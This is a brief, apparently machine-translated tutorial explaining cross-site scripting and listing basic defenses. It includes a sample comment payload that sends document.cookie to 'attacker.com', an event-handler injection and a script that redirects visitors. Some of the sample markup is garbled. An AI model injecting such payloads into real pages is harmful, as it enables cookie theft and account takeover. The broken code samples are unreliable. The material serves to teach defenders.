XSS stands for Cross Site Scripting, not CSS to distinguish it from stylesheets. The core principle of XSS is to execute malicious JS code in target pages.
Take A common example: Website A has A user comment function. Assuming that website A does not take any measures to prevent XSS, an attacker can enter the following content:
<script> const cookie = document.cookie; // Ajax sends cookies to the attacker's own server (pseudocode) Ajax ('http://attacker.com', cookie); </script>Copy the codeWebsite A saves the content to the server and displays it on the front page. At this time, user A just accesses the comment page of this page. User A’s browser recognizes script and directly executes the code in SCIRpt. It happens that the login credentials of website A are all placed in cookies, so the attacker can log in to website A as user A.
XSSAttack mode of
In addition to the script mode mentioned above, there are also , such as:
<img SRC = "onerror='alert("hey!" <a onmousemove='do something here'>Copy the codeXSSAttack intention of
-
Steal from the target web page
cookievalueCookies can be set to HTTP only via the server (browser support is required, after all, cookie ownership belongs to the browser).
-
Hijacking traffic to redirect malicious traffic
Insert code like the following:
<script>window.location.href="http://www.baidu.com"; </script>Copy the codeIt’s like stealing traffic from the target site.
Precautions,
- filter
<script>,<img>,<a>Such as tag - Translate and encode the content uploaded by the user, so that the browser will not interpret the label and do not affect the display effect.